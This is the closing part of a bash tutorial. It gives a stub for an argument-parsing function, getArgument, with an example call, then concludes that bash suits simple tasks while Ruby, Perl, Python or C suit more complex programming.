Prototype requested, and method stub:

 
function getArgument {
arg=$1
shift 1;
args=$@;
}
 

It should be called like

 
getArgument "-r" $@
 

Conclusion

On this part of the curriculum, we have been learning Linux essentials, and have gotten in touch with programming using the bash shell and bash scripts. Bash is a system administrator's power tool, but when it comes to more advanced functionalities, it will quickly hit its limits. Always we can use third-party software to bring some more functionalities into it (for example, the curl program), but this will tend to become complicated.

As an advanced programmer, you will prefer to use bash for simple tasks, but when it comes to complex processing, other programming environments such as Ruby, perl or python will be more adapted to your needs. And if you need to manipulate data at a lower level, there's C and its eerie magic.

In the next sections of the curriculum, we'll dive deeper into programming.

Bash book is part of a series on programming.
<center>
</center>